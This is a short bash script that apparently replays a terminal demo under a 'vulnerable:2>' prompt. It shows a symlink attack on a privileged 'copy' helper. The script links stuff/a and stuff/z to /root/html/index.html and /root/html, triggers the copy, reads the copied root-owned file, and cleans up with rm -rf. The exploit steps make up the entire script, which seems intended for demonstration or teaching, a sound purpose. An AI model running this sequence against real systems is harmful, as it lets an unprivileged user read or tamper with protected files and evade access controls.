#!/bin/bash

echo -n "vulnerable:2> "
sleep 1
echo "ln -s /root/html/index.html stuff/a" | pv -qL 10 
ln -s /root/html/index.html stuff/a
echo -n "vulnerable:2> "
sleep 1
echo "mkdir stuff/b" | pv -qL 10 
mkdir stuff/b
echo -n "vulnerable:2> "
sleep 1
echo "copy" | pv -qL 10 
copy
echo -n "vulnerable:2> "
sleep 1
echo "cat stuff/b/a" | pv -qL 10 
cat stuff/b/a
echo -n "vulnerable:2> "
sleep 1
echo "mv stuff/b/a stuff/index.html" | pv -qL 10 
mv stuff/b/a stuff/index.html
echo -n "vulnerable:2> "
sleep 1
echo "cat stuff/index.html" | pv -qL 10 
cat stuff/index.html
echo -n "vulnerable:2> "
sleep 1
echo "rm -rf stuff/a stuff/b" | pv -qL 10 
rm -rf stuff/a stuff/b
echo -n "vulnerable:2> "
sleep 1
echo "ln -s /root/html stuff/z" | pv -qL 10 
ln -s /root/html stuff/z
echo -n "vulnerable:2> "
sleep 1
echo "copy" | pv -qL 10 
copy
exit
